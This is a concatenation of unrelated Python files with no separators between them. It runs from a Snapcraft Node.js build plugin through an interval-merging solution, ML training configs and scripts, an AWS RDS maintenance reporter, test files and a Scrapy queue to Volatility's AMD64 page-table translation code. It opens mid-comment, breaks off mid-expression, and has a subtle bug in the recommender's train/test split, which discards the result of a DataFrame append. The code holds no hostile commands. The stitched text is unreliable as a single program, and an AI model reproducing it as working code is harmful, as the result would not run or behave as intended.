Snapcraft will consider the build step dirty. return ["node-packages", "npm-run", "npm-flags"] @classmethod def get_pull_properties(cls): # Inform Snapcraft of the properties associated with pulling. If these # change in the YAML Snapcraft will consider the build step dirty. return ["node-engine", "node-package-manager"] @property def _nodejs_tar(self): if self._nodejs_tar_handle is None: self._nodejs_tar_handle = sources.Tar( self._nodejs_release_uri, self._npm_dir ) return self._nodejs_tar_handle @property def _yarn_tar(self): if self._yarn_tar_handle is None: self._yarn_tar_handle = sources.Tar(_YARN_URL, self._npm_dir) return self._yarn_tar_handle def __init__(self, name, options, project): super().__init__(name, options, project) self._source_package_json = os.path.join( os.path.abspath(self.options.source), "package.json" ) self._npm_dir = os.path.join(self.partdir, "npm") self._manifest = collections.OrderedDict() self._nodejs_release_uri = get_nodejs_release( self.options.node_engine, self.project.deb_arch ) self._nodejs_tar_handle = None self._yarn_tar_handle = None def pull(self): super().pull() os.makedirs(self._npm_dir, exist_ok=True) self._nodejs_tar.download() if self.options.node_package_manager == "yarn": self._yarn_tar.download() # do the install in the pull phase to download all dependencies. 
if self.options.node_package_manager == "npm": self._npm_install(rootdir=self.sourcedir) else: self._yarn_install(rootdir=self.sourcedir) def clean_pull(self): super().clean_pull() # Remove the npm directory (if any) if os.path.exists(self._npm_dir): shutil.rmtree(self._npm_dir) def build(self): super().build() if self.options.node_package_manager == "npm": installed_node_packages = self._npm_install(rootdir=self.builddir) # Copy the content of the symlink to the build directory # LP: #1702661 modules_dir = os.path.join(self.installdir, "lib", "node_modules") _copy_symlinked_content(modules_dir) else: installed_node_packages = self._yarn_install(rootdir=self.builddir) lock_file_path = os.path.join(self.sourcedir, "yarn.lock") if os.path.isfile(lock_file_path): with open(lock_file_path) as lock_file: self._manifest["yarn-lock-contents"] = lock_file.read() self._manifest["node-packages"] = [ "{}={}".format(name, installed_node_packages[name]) for name in installed_node_packages ] def _npm_install(self, rootdir): self._nodejs_tar.provision( self.installdir, clean_target=False, keep_tarball=True ) npm_cmd = ["npm"] + self.options.npm_flags npm_install = npm_cmd + ["--cache-min=Infinity", "install"] for pkg in self.options.node_packages: self.run(npm_install + ["--global"] + [pkg], cwd=rootdir) if os.path.exists(os.path.join(rootdir, "package.json")): self.run(npm_install, cwd=rootdir) self.run(npm_install + ["--global"], cwd=rootdir) for target in self.options.npm_run: self.run(npm_cmd + ["run", target], cwd=rootdir) return self._get_installed_node_packages("npm", self.installdir) def _yarn_install(self, rootdir): self._nodejs_tar.provision( self.installdir, clean_target=False, keep_tarball=True ) self._yarn_tar.provision(self._npm_dir, clean_target=False, keep_tarball=True) yarn_cmd = [os.path.join(self._npm_dir, "bin", "yarn")] yarn_cmd.extend(self.options.npm_flags) if "http_proxy" in os.environ: yarn_cmd.extend(["--proxy", os.environ["http_proxy"]]) if "https_proxy" in os.environ: yarn_cmd.extend(["--https-proxy", os.environ["https_proxy"]]) flags = [] if rootdir == self.builddir: yarn_add = yarn_cmd + ["global", "add"] flags.extend( [ "--offline", "--prod", "--global-folder", self.installdir, "--prefix", self.installdir, ] ) else: yarn_add = yarn_cmd + ["add"] for pkg in self.options.node_packages: self.run(yarn_add + [pkg] + flags, cwd=rootdir) # local packages need to be added as if they were remote, we # remove the local package.json so `yarn add` doesn't pollute it. if os.path.exists(self._source_package_json): with contextlib.suppress(FileNotFoundError): os.unlink(os.path.join(rootdir, "package.json")) shutil.copy( self._source_package_json, os.path.join(rootdir, "package.json") ) self.run(yarn_add + ["file:{}".format(rootdir)] + flags, cwd=rootdir) # npm run would require to bring back package.json if self.options.npm_run and os.path.exists(self._source_package_json): # The current package.json is the yarn prefilled one. 
with contextlib.suppress(FileNotFoundError): os.unlink(os.path.join(rootdir, "package.json")) os.link(self._source_package_json, os.path.join(rootdir, "package.json")) for target in self.options.npm_run: self.run( yarn_cmd + ["run", target], cwd=rootdir, env=self._build_environment(rootdir), ) return self._get_installed_node_packages("npm", self.installdir) def _get_installed_node_packages(self, package_manager, cwd): try: output = self.run_output( [package_manager, "ls", "--global", "--json"], cwd=cwd ) except subprocess.CalledProcessError as error: # XXX When dependencies have missing dependencies, an error like # this is printed to stderr: # npm ERR! peer dep missing: glob@*, required by glob-promise@3.1.0 # retcode is not 0, which raises an exception. output = error.output.decode(sys.getfilesystemencoding()).strip() packages = collections.OrderedDict() dependencies = json.loads(output, object_pairs_hook=collections.OrderedDict)[ "dependencies" ] while dependencies: key, value = dependencies.popitem(last=False) # XXX Just as above, dependencies without version are the ones # missing. if "version" in value: packages[key] = value["version"] if "dependencies" in value: dependencies.update(value["dependencies"]) return packages def get_manifest(self): return self._manifest def _build_environment(self, rootdir): env = os.environ.copy() if rootdir.endswith("src"): hidden_path = os.path.join(rootdir, "node_modules", ".bin") if env.get("PATH"): new_path = "{}:{}".format(hidden_path, env.get("PATH")) else: new_path = hidden_path env["PATH"] = new_path return env def _get_nodejs_base(node_engine, machine): if machine not in _NODEJS_ARCHES: raise errors.SnapcraftEnvironmentError( "architecture not supported ({})".format(machine) ) return _NODEJS_BASE.format(version=node_engine, arch=_NODEJS_ARCHES[machine]) def get_nodejs_release(node_engine, arch): return _NODEJS_TMPL.format( version=node_engine, base=_get_nodejs_base(node_engine, arch) ) def _copy_symlinked_content(modules_dir): """Copy symlinked content. When running newer versions of npm, symlinks to the local tree are created from the part's installdir to the root of the builddir of the part (this only affects some build configurations in some projects) which is valid when running from the context of the part but invalid as soon as the artifacts migrate across the steps, i.e.; stage and prime. If modules_dir does not exist we simply return. """ if not os.path.exists(modules_dir): return modules = [os.path.join(modules_dir, d) for d in os.listdir(modules_dir)] symlinks = [l for l in modules if os.path.islink(l)] for link_path in symlinks: link_target = os.path.realpath(link_path) os.unlink(link_path) link_or_copy_tree(link_target, link_path) algorithms/0056_merge_intervals.py0 class Solution: # time: O(nlogn) # space: O(n) def merge(self, intervals: list[list[int]]) -> list[list[int]]: intervals.sort() result = [intervals[0]] for interval in intervals: if interval[0] <= result[-1][1]: result[-1][1] = max(result[-1][1], interval[1]) else: result.append(interval) return result kimvwijnen/segm-fine-tuning #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2017 Division of Medical Image Computing, German Cancer Research Center (DKFZ) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from trixi.util import Config def get_config(): dataset = 'atrial' # TODO dataset = 'atrial' (for training the atrial on 5 images) fine_tune = 'None' # TODO (no freezing, training whole network from scratch) download_data_from_drive = True # TODO after running once, change to False # dataset = 'brats' # TODO uncomment # TODO with 3 fine tuning options, uncomment sequentially: # fine_tune = 'None' # (no freezing, training whole network) # fine_tune = 'expanding_all' # (for freezing contracting/left path, training expanding/right path) # fine_tune = 'expanding_plus1' # (for freezing the first bit of contracting path, training bottom part and expanding path) if dataset == 'atrial': checkpoint_dir = '' # leave empty to train from scratch for atrial segmentation (on 5 samples) checkpoint_filename = '' exp_name = 'train_from_scratch_heart' elif dataset == 'brats': checkpoint_dir = './output_experiment/[dir_brats_exp]/checkpoint/' # TODO add name of directory with model checkpoint_filename = 'checkpoint_last.pth.tar' exp_name = 'brats_for_atrialsegm_finetune_' + 'all_layers' if fine_tune=='None' else fine_tune else: raise ValueError('No config settings for this dataset') c = get_config_heart(fine_tune_type=fine_tune, exp_name=exp_name, checkpoint_filename=checkpoint_filename, checkpoint_dir=checkpoint_dir, nr_train_samples=5, download_data_from_drive=download_data_from_drive) # training on 5 images (if want to use original split use train_samples=0 instead of train_samples=5 print(c) return c def get_config_heart(fine_tune_type='None', exp_name='', checkpoint_filename='', checkpoint_dir='', nr_train_samples=0, download_data_from_drive=False): # Set your own path, if needed. data_root_dir = os.path.abspath('data') # The path where the downloaded dataset is stored. c = Config( update_from_argv=True, # Train parameters num_classes=2, in_channels=1, batch_size=8, patch_size=256, n_epochs=60, learning_rate=0.0002, fold=0, # The 'splits.pkl' may contain multiple folds. Here we choose which one we want to use. device="cuda", # 'cuda' is the default CUDA device, you can use also 'cpu'. For more information, see https://pytorch.org/docs/stable/notes/cuda.html # Logging parameters name=exp_name, author='maxi', # Author of this project plot_freq=10, # How often should stuff be shown in visdom append_rnd_string=False, start_visdom=False, do_instancenorm=True, # Defines whether or not the UNet does a instance normalization in the contracting path do_load_checkpoint=True, checkpoint_filename=checkpoint_filename, checkpoint_dir=checkpoint_dir, fine_tune=fine_tune_type, # Adapt to your own path, if needed. download_data=download_data_from_drive, google_drive_id='1RzPB1_bqzQhlWvU-', dataset_name='Task02_Heart', base_dir=os.path.abspath('output_experiment'), # Where to log the output of the experiment. data_root_dir=data_root_dir, # The path where the downloaded dataset is stored. 
data_dir=os.path.join(data_root_dir, 'Task02_Heart/preprocessed'), # This is where your training and validation data is stored data_test_dir=os.path.join(data_root_dir, 'Task02_Heart/preprocessed'), # This is where your test data is stored split_dir=os.path.join(data_root_dir, 'Task02_Heart'), # This is where the 'splits.pkl' file is located, that holds your splits. train_samples=nr_train_samples, # This is the amount of samples used in the train set. Use 0 for original split (1/2 train, 1/4 val, 1/4 test) # The validation set will be the same size, and the test set is the rest of the images # Testing visualize_segm=True ) print(c) return c """ retrieves upcoming maintenance windows for RDS clusters and instances. """ from typing import Optional, Dict, Tuple from datetime import datetime import boto3 from mypy_boto3_rds import RDSClient from aws_maintenance_window_reporter.maintenance_action import MaintenanceAction from aws_maintenance_window_reporter.aws_maintenance_window import ( next_maintenance_window, ) def get_pending_maintenance_actions( session: boto3.session.Session, ) -> [MaintenanceAction]: """ gets a list of pending maintenance actions on RDS clusters and instances """ result = [] client = session.client("rds") for response in client.get_paginator("describe_db_instances").paginate(): for instance in response["DBInstances"]: if instance.get("PendingModifiedValues"): arn = instance["DBInstanceArn"] result.append( _create_maintenance_action_from_rds_arn( arn, None, "Pending modified values" ) ) for response in client.get_paginator("describe_db_clusters").paginate(): for cluster in response["DBClusters"]: arn = cluster["DBClusterArn"] not_before, _ = get_next_maintenance_window_of_resource(client, arn) if cluster.get("PendingModifiedValues"): result.append( _create_maintenance_action_from_rds_arn( arn, None, "Pending modified values" ) ) for response in client.get_paginator( "describe_pending_maintenance_actions" ).paginate(): for action in response["PendingMaintenanceActions"]: details = action["PendingMaintenanceActionDetails"] apply_dates = sorted( map( lambda d: d["CurrentApplyDate"], filter(lambda d: "CurrentApplyDate" in d, details), ) ) not_before = apply_dates[0] if apply_dates else None description = "; ".join( map( lambda d: d["Description"], details, ) ) result.append( _create_maintenance_action_from_rds_arn( action["ResourceIdentifier"], not_before, description ) ) return result def _create_maintenance_action_from_rds_arn( arn: str, not_before: Optional[datetime], description: Optional[str] ) -> MaintenanceAction: """ creates a MaintenanceAction from an RDS ARN. The resource type is set to the associated DataDog tag for the respective resource type. """ rds_resource_type_to_datadog_tag = { "db": "dbinstanceidentifier", "cluster": "dbclusteridentifier", } resource_id = arn.split(":")[-1] resource_type = arn.split(":")[-2] return MaintenanceAction( resource_id, rds_resource_type_to_datadog_tag.get(resource_type, resource_type), "rds", not_before, description, ) # cached maintenance windows per ARN _cache: Dict[str, Tuple[datetime, datetime]] = {} def get_next_maintenance_window_of_resource( rds: RDSClient, arn: str ) -> (datetime, datetime): """ returns the next maintenance window for the RDS resource specified with by `arn`. The result is stored in a cache. 
Subsequent calls will return the previously cached value """ if arn not in _cache: if ":cluster:" in arn: response = rds.describe_db_clusters(DBClusterIdentifier=arn) window = response["DBClusters"][0]["PreferredMaintenanceWindow"] else: response = rds.describe_db_instances(DBInstanceIdentifier=arn) window = response["DBInstances"][0]["PreferredMaintenanceWindow"] _cache[arn] = next_maintenance_window(window, datetime.utcnow()) return _cache[arn] lang_codes = { 19: "Arabic", 22: "Bengali", 14: "Bulgarian", 37: "Burmese", 33: "Catalan", 21: "Chinese (Simp)", 35: "Chinese (Trad)", 24: "Czech", 20: "Danish", 5: "Dutch", 1: "English", 34: "Filipino", 11: "Finnish", 10: "French", 8: "German", 13: "Greek", 39: "Hebrew", 40: "Hindi", 9: "Hungarian", 27: "Indonesian", 6: "Italian", 2: "Japanese", 28: "Korean", 38: "Lithuanian", 31: "Malay", 25: "Mongolian", 42: "Norwegian", 41: "Other", 30: "Persian", 3: "Polish", 16: "Portuguese (Br)", 17: "Portuguese (Pt)", 23: "Romanian", 7: "Russian" , 4: "Serbo-Croatian", 15: "Spanish (Es)", 29: "Spanish (LATAM)", 18: "Swedish", 32: "Thai", 26: "Turkish", 36: "Ukrainian", 12: "Vietnamese" } class Language: """ A class with a bunch of class methods to aid with finding a chapter in the desired language. """ def __init__(self, code, scdry=None): self._lang_code = code self._scdry = scdry def __eq__(self, other): if other in (self._lang_code, self._scdry): return True return False @classmethod def English(cls): return cls('gb') @classmethod def NoLang(cls): return cls('') @classmethod def German(cls): return cls('de') @classmethod def French(cls): return cls('fr') @classmethod def Dutch(cls): return cls('nl') @classmethod def Spanish(cls): return cls('es', 'mx') @classmethod def Mexican(cls): return cls('es', 'mx')machotools/tests/test_detect.py import unittest from machotools.detect import is_macho, is_dylib, is_executable, is_bundle from machotools.tests.common import ( FOO_DYLIB, SIMPLE_MAIN, SIMPLE_BUNDLE, NO_MACHO_FILE, TINY_FILE ) class TestDetect(unittest.TestCase): def test_tiny_file(self): self.assertFalse(is_macho(TINY_FILE)) def test_dylib(self): self.assertTrue(is_dylib(FOO_DYLIB)) self.assertFalse(is_bundle(FOO_DYLIB)) self.assertFalse(is_executable(FOO_DYLIB)) def test_bundle(self): self.assertFalse(is_dylib(SIMPLE_BUNDLE)) self.assertTrue(is_bundle(SIMPLE_BUNDLE)) self.assertFalse(is_executable(SIMPLE_BUNDLE)) def test_executable(self): self.assertFalse(is_dylib(SIMPLE_MAIN)) self.assertFalse(is_bundle(SIMPLE_MAIN)) self.assertTrue(is_executable(SIMPLE_MAIN)) def test_no_macho(self): self.assertFalse(is_dylib(NO_MACHO_FILE)) self.assertFalse(is_bundle(NO_MACHO_FILE)) self.assertFalse(is_executable(NO_MACHO_FILE)) def test_is_macho(self): self.assertTrue(is_macho(FOO_DYLIB)) self.assertTrue(is_macho(SIMPLE_MAIN)) self.assertTrue(is_macho(SIMPLE_BUNDLE)) self.assertFalse(is_macho(NO_MACHO_FILE)) #!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved. 
import logging import os import pprint import unittest import uuid import numpy as np import pytest import pytorch_lightning as pl import torch from parameterized import parameterized from reagent.gym.agents.agent import Agent from reagent.gym.datasets.replay_buffer_dataset import OfflineReplayBufferDataset from reagent.gym.envs import Gym from reagent.gym.policies.random_policies import make_random_policy_for_env from reagent.gym.runners.gymrunner import evaluate_for_n_episodes from reagent.gym.utils import build_normalizer, fill_replay_buffer from reagent.model_managers.union import ModelManager__Union from reagent.replay_memory.circular_replay_buffer import ReplayBuffer from reagent.test.base.horizon_test_base import HorizonTestBase from reagent.workflow.types import RewardOptions # for seeding the environment SEED = 0 logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) """ These are trained offline. """ GYM_TESTS = [ ("CEM Cartpole", "configs/world_model/cem_cartpole_offline.yaml"), ( "CEM Single World Model Linear Dynamics", "configs/world_model/cem_single_world_model_linear_dynamics_offline.yaml", ), ( "CEM Many World Models Linear Dynamics", "configs/world_model/cem_many_world_models_linear_dynamics_offline.yaml", ), ] curr_dir = os.path.dirname(__file__) class TestGymOffline(HorizonTestBase): # pyre-fixme[16]: Module `parameterized` has no attribute `expand`. @parameterized.expand(GYM_TESTS) def test_gym_offline_cpu(self, name: str, config_path: str): self.run_from_config( run_test=run_test_offline, config_path=os.path.join(curr_dir, config_path), use_gpu=False, ) logger.info(f"{name} passes!") # pyre-fixme[16]: Module `parameterized` has no attribute `expand`. @parameterized.expand(GYM_TESTS) @pytest.mark.serial @unittest.skipIf(not torch.cuda.is_available(), "CUDA not available") def test_gym_offline_gpu(self, name: str, config_path: str): self.run_from_config( run_test=run_test_offline, config_path=os.path.join(curr_dir, config_path), use_gpu=True, ) logger.info(f"{name} passes!") def evaluate_cem(env, manager, trainer_module, num_eval_episodes: int): # NOTE: for CEM, serving isn't implemented policy = manager.create_policy(trainer_module, serving=False) agent = Agent.create_for_env(env, policy) return evaluate_for_n_episodes( n=num_eval_episodes, env=env, agent=agent, max_steps=env.max_steps ) def identity_collate(batch): assert isinstance(batch, list) and len(batch) == 1, f"Got {batch}" return batch[0] def run_test_offline( env_name: str, model: ModelManager__Union, replay_memory_size: int, num_batches_per_epoch: int, num_train_epochs: int, passing_score_bar: float, num_eval_episodes: int, minibatch_size: int, use_gpu: bool, ): env = Gym(env_name=env_name) env.seed(SEED) env.action_space.seed(SEED) normalization = build_normalizer(env) logger.info(f"Normalization is: \n{pprint.pformat(normalization)}") manager = model.value trainer = manager.build_trainer( use_gpu=use_gpu, reward_options=RewardOptions(), normalization_data_map=normalization, ) # first fill the replay buffer to burn_in replay_buffer = ReplayBuffer( replay_capacity=replay_memory_size, batch_size=minibatch_size ) # always fill full RB random_policy = make_random_policy_for_env(env) agent = Agent.create_for_env(env, policy=random_policy) fill_replay_buffer( env=env, replay_buffer=replay_buffer, desired_size=replay_memory_size, agent=agent, ) device = torch.device("cuda") if use_gpu else None dataset = OfflineReplayBufferDataset.create_for_trainer( trainer, env, replay_buffer, 
batch_size=minibatch_size, num_batches=num_batches_per_epoch, device=device, ) data_loader = torch.utils.data.DataLoader(dataset, collate_fn=identity_collate) pl_trainer = pl.Trainer( max_epochs=num_train_epochs, gpus=int(use_gpu), deterministic=True, default_root_dir=f"lightning_log_{str(uuid.uuid4())}", ) pl_trainer.fit(trainer, data_loader) logger.info(f"Evaluating after training for {num_train_epochs} epochs: ") eval_rewards = evaluate_cem(env, manager, trainer, num_eval_episodes) mean_rewards = np.mean(eval_rewards) assert ( mean_rewards >= passing_score_bar ), f"{mean_rewards} doesn't pass the bar {passing_score_bar}." if __name__ == "__main__": unittest.main() import numpy as np import pandas as pd from libreco.data import split_by_ratio_chrono, DatasetFeat from libreco.algorithms import YouTubeRanking # remove unnecessary tensorflow logging import os import tensorflow as tf os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' os.environ["KMP_WARNINGS"] = "FALSE" tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR) ### PARAMETERS embed_size = 300 n_epochs = 20 lr = 1e-4 batch_size = 512 hidden_units = "128,64,32" ### FUNCTIONS def split_train_test_by_windowid(df, test_size = 0.2): first_time = True for windowid in df['WindowID'].unique(): if first_time: test_df = df.groupby('WindowID').get_group(windowid).sample(frac = test_size) first_time = False else: test_df.append(df.groupby('WindowID').get_group(windowid).sample(frac = test_size)) train_df = df.drop(test_df.index) return train_df, test_df def generate_recommendation_output(user_list, job_list, output_dir): output_dict = {} for i, user in enumerate(user_list): if user not in output_dict: output_dict[user] = [job_list[i]] else: output_dict[user].append(job_list[i]) with open(output_dir, 'w') as outfile: outfile.write("UserId, JobIds\n") for user, value in output_dict.items(): outfile.write(f'{str(user)},' + " ".join([str(x) for x in value]) + "\n") def split_train_test(df): return df.loc[df['Split'] == 'Train'], df.loc[df['Split'] == 'Test'] ### READ DATA data = pd.read_csv( "../../data/kaggle-job-recommendation/apps_with_item_user_data.tsv", sep = "\t" ) ### SAMPLE DATA - SUPPRESS WHEN LIVE # data = data.sample(10000) ### REFORMAT DATA # column names need to play ball with library data.rename(columns = { "UserID": "user", "JobID": "item", "Label": "label" }, inplace=True) # replace nan on int columns with 0 data['WorkHistoryCount'] = data['WorkHistoryCount'].fillna(0) data['TotalYearsExperience'] = data['TotalYearsExperience'].fillna(0) data['ManagedHowMany'] = data['ManagedHowMany'].fillna(0) # define types data = data.astype({ "user": int, "item": int, "label": int, "Split": str, "WindowID": int, "Title": str, "Popularity": int, "DegreeType": str, "Major": str, "WorkHistoryCount": int, "TotalYearsExperience": int, "ManagedHowMany": int }) # split train and test sets by WindowID # train_df, test_df = split_train_test_by_windowid(data) train_df, test_df = split_train_test(data) print(f"Shape of Train Set: {train_df.shape}") print(f"Shape of Test Set: {test_df.shape}") # define columns sparse_col = ["Title", "DegreeType", "Major"] dense_col = ["Popularity", "WorkHistoryCount", "TotalYearsExperience", "ManagedHowMany"] user_col = ["DegreeType", "Major", "WorkHistoryCount", "TotalYearsExperience", "ManagedHowMany"] item_col = ["Title", "Popularity"] # put data into format accepted by library train_data, data_info = DatasetFeat.build_trainset( train_df, user_col, item_col, sparse_col, dense_col ) test_data = 
DatasetFeat.build_testset(test_df) # sample negative items for each record train_data.build_negative_samples(data_info) test_data.build_negative_samples(data_info) ### CREATE AND TRAIN MODEL ytb_ranking = YouTubeRanking(task="ranking", data_info=data_info, embed_size=embed_size, n_epochs=n_epochs, lr=lr, batch_size=batch_size, use_bn=True, hidden_units=hidden_units) ytb_ranking.fit(train_data, verbose=2, shuffle=True, eval_data=test_data, metrics=["loss", "roc_auc", "precision", "recall", "map", "ndcg"]) ### MAKE PREDICTIONS output_user_id_list = [] output_job_id_list = [] for window_id in test_df['WindowID'].unique(): for user in list(set(test_df['user'][test_df['WindowID'] == window_id])): if user in list(set(train_df['user'])): for prediction in ytb_ranking.recommend_user( user = user, n_rec = 150, cold_start= "popular" ): output_user_id_list.append(user) output_job_id_list.append(prediction) # users = list(set(test_df['user'][test_df['WindowID'] == window_id])) # predictions = [ytb_ranking.recommend_user( # user = user, # n_rec = 150, # cold_start= "popular" # ) for user in users] # output_user_id_list.extend(users) # output_job_id_list.extend(predictions) generate_recommendation_output(output_user_id_list, output_job_id_list, "model_predictions/yt_recommender.csv") import logging from os_scrapy_rq_crawler.utils import HTTPRequestQueue, MemoryRequestQueue class AsyncRequestQueue(object): def __init__(self, crawler, mq, rq): self.crawler = crawler self.mq = mq self.rq = rq self.logger = logging.getLogger(self.__class__.__name__) async def qids(self, k=16): m = int(k / 2) qids = [] if len(self.mq) <= 0 else self.mq.qids(m if m else 1) if self.closing(): return qids r = k - len(qids) if r <= 0: return qids rqids = [] try: rqids = await self.rq.qids(r) except Exception as e: self.logger.error(f"qids {e}") if not rqids: return qids qids.extend(rqids) return set(qids) async def pop(self, qid=None): if self.mq.qsize(qid) > 0: return self.mq.pop(qid) if self.closing(): return None return await self.rq.pop(qid) def push(self, request): self.mq.push(request) def closing(self) -> bool: return bool(self.crawler.engine.slot.closing) def __len__(self): l = len(self.mq) if l > 0: return l if self.closing(): return 0 return 1 def close(self): self.mq.close() @classmethod def from_crawler(cls, crawler): settings = crawler.settings mq = MemoryRequestQueue() assert "RQ_API" in settings, "RQ_API not configured" api = settings.get("RQ_API") timeout = settings.getfloat("RQ_API_TIMEOUT", 3) rq = HTTPRequestQueue(api, timeout) return cls(crawler, mq, rq) williamclot/MemoryVisualizer # Volatility # Copyright (C) 2013 Volatility Foundation # # Authors: # # # This file is part of Volatility. # # Volatility is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # Volatility is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Volatility. If not, see . 
# import volatility.plugins.addrspaces.paged as paged import volatility.obj as obj import struct ptrs_page = 2048 entry_size = 8 pde_shift = 21 ptrs_per_pde = 512 page_shift = 12 ptrs_per_pae_pgd = 512 ptrs_per_pae_pte = 512 class AMD64PagedMemory(paged.AbstractWritablePagedMemory): """ Standard AMD 64-bit address space. This class implements the AMD64/IA-32E paging address space. It is responsible for translating each virtual (linear) address to a physical address. This is accomplished using hierarchical paging structures. Every paging structure is 4096 bytes and is composed of entries. Each entry is 64 bits. The first paging structure is located at the physical address found in CR3 (dtb). Additional Resources: - Intel(R) 64 and IA-32 Architectures Software Developer's Manual Volume 3A: System Programming Guide. Section 4.3 http://www.intel.com/products/processor/manuals/index.htm - AMD64 Architecture Programmer's Manual Volume 2: System Programming http://support.amd.com/us/Processor_TechDocs/24593_APM_v2.pdf - , , , and , "FATKit: A Framework for the Extraction and Analysis of Digital Forensic Data from Volatile System Memory" ,Digital Investigation Journal 3(4):197-210, December 2006. (submitted February 2006) - , "Acquisition and Analysis of Windows Memory," University of Strathclyde, Glasgow, April 2006. - ., & ., & . "Windows Internals, 5th Edition", Microsoft Press, 2009. """ order = 60 pae = False checkname = 'AMD64ValidAS' paging_address_space = True minimum_size = 0x1000 alignment_gcd = 0x1000 skip_duplicate_entries = False _longlong_struct = struct.Struct("<Q") def entry_present(self, entry): # bit 0 of a paging-structure entry is the present flag return bool(entry) and (entry & 1) == 1 def page_size_flag(self, entry): # bit 7 (PS) marks a large-page mapping return (entry & (1 << 7)) == (1 << 7) def pml4e_index(self, vaddr): # bits 47:39 of the linear address select the PML4 entry return (vaddr & 0xff8000000000) >> 39 def get_2MB_paddr(self, vaddr, pgd_entry): # bits 51:21 come from the PDE, bits 20:0 from the linear address return (pgd_entry & 0xfffffffe00000) | (vaddr & 0x1fffff) def get_pml4e(self, vaddr): ''' This method returns the Page Map Level 4 (PML4) entry for the virtual address. Bits 47:39 are used to select the appropriate 8 byte entry in the Page Map Level 4 Table. "Bits 51:12 are from CR3" [Intel] "Bits 11:3 are bits 47:39 of the linear address" [Intel] "Bits 2:0 are 0" [Intel] ''' pml4e_paddr = (self.dtb & 0xffffffffff000) | ((vaddr & 0xff8000000000) >> 36) return self.read_long_long_phys(pml4e_paddr) def get_pdpi(self, vaddr, pml4e): ''' This method returns the Page Directory Pointer entry for the virtual address. Bits 38:30 are used to select the appropriate 8 byte entry in the Page Directory Pointer table. "Bits 51:12 are from the PML4E" [Intel] "Bits 11:3 are bits 38:30 of the linear address" [Intel] "Bits 2:0 are all 0" [Intel] ''' pdpte_paddr = (pml4e & 0xffffffffff000) | ((vaddr & 0x7FC0000000) >> 27) return self.read_long_long_phys(pdpte_paddr) def get_1GB_paddr(self, vaddr, pdpte): ''' If the Page Directory Pointer Table entry represents a 1-GByte page, this method extracts the physical address of the page.
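For illustration (arbitrary example values): with pdpte = 0x140000083 and vaddr = 0xfffff80012345678, the return expression below evaluates to (0x140000083 & 0xfffffc0000000) | (0xfffff80012345678 & 0x3fffffff) = 0x140000000 | 0x12345678 = 0x152345678.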
"Bits 51:30 are from the PDPTE" [Intel] "Bits 29:0 are from the original linear address" [Intel] ''' return (pdpte & 0xfffffc0000000) | (vaddr & 0x3fffffff) def pde_index(self, vaddr): return (vaddr >> pde_shift) & (ptrs_per_pde - 1) def pdba_base(self, pdpe): return pdpe & 0xFFFFFFFFFF000 def get_pgd(self, vaddr, pdpe): pgd_entry = self.pdba_base(pdpe) + self.pde_index(vaddr) * entry_size return self.read_long_long_phys(pgd_entry) def pte_index(self, vaddr): return (vaddr >> page_shift) & (ptrs_per_pde - 1) def ptba_base(self, pde): return pde & 0xFFFFFFFFFF000 def get_pte(self, vaddr, pgd): pgd_val = self.ptba_base(pgd) + self.pte_index(vaddr) * entry_size return self.read_long_long_phys(pgd_val) def pte_pfn(self, pte): return pte & 0xFFFFFFFFFF000 def get_paddr(self, vaddr, pte): return self.pte_pfn(pte) | (vaddr & ((1 << page_shift) - 1)) def vtop(self, vaddr): ''' This method translates an address in the virtual address space to its associated physical address. Invalid entries should be handled with operating system abstractions. ''' vaddr = long(vaddr) retVal = None pml4e = self.get_pml4e(vaddr) if not self.entry_present(pml4e): return None pdpe = self.get_pdpi(vaddr, pml4e) if not self.entry_present(pdpe): return retVal if self.page_size_flag(pdpe): return self.get_1GB_paddr(vaddr, pdpe) pgd = self.get_pgd(vaddr, pdpe) if self.entry_present(pgd): if self.page_size_flag(pgd): retVal = self.get_2MB_paddr(vaddr, pgd) else: pte = self.get_pte(vaddr, pgd) if self.entry_present(pte): retVal = self.get_paddr(vaddr, pte) return retVal def read_long_long_phys(self, addr): ''' This method returns a 64-bit little endian unsigned integer from the specified address in the physical address space. If the address cannot be accessed, then the method returns None. This code was derived directly from legacyintel.py ''' try: string = self.base.read(addr, 8) except IOError: string = None if not string: return obj.NoneObject("Unable to read_long_long_phys at " + hex(addr)) longlongval, = self._longlong_struct.unpack(string) return longlongval def get_available_pages(self, with_pte = False): ''' This method generates a list of pages that are available within the address space. The entries in are composed of the virtual address of the page and the size of the particular page (address, size). It walks the 0x1000/0x8 (0x200) entries in each Page Map, Page Directory, and Page Table to determine which pages are accessible. 
''' # read the full pml4 pml4 = self.base.read(self.dtb & 0xffffffffff000, 0x200 * 8) if pml4 is None: return # unpack all entries pml4_entries = struct.unpack('<512Q', pml4) for pml4e in range(0, 0x200): vaddr = pml4e << 39 pml4e_value = pml4_entries[pml4e] if not self.entry_present(pml4e_value): continue pdpt_base = (pml4e_value & 0xffffffffff000) pdpt = self.base.read(pdpt_base, 0x200 * 8) if pdpt is None: continue pdpt_entries = struct.unpack('<512Q', pdpt) for pdpte in range(0, 0x200): vaddr = (pml4e << 39) | (pdpte << 30) pdpte_value = pdpt_entries[pdpte] if not self.entry_present(pdpte_value): continue if self.page_size_flag(pdpte_value): if with_pte: yield (pdpte_value, vaddr, 0x40000000) else: yield (vaddr, 0x40000000) continue pd_base = self.pdba_base(pdpte_value) pd = self.base.read(pd_base, 0x200 * 8) if pd is None: continue pd_entries = struct.unpack('<512Q', pd) prev_pd_entry = None for j in range(0, 0x200): soffset = (j * 0x200 * 0x200 * 8) entry = pd_entries[j] if self.skip_duplicate_entries and entry == prev_pd_entry: continue prev_pd_entry = entry if self.entry_present(entry) and self.page_size_flag(entry): if with_pte: yield (entry, vaddr + soffset, 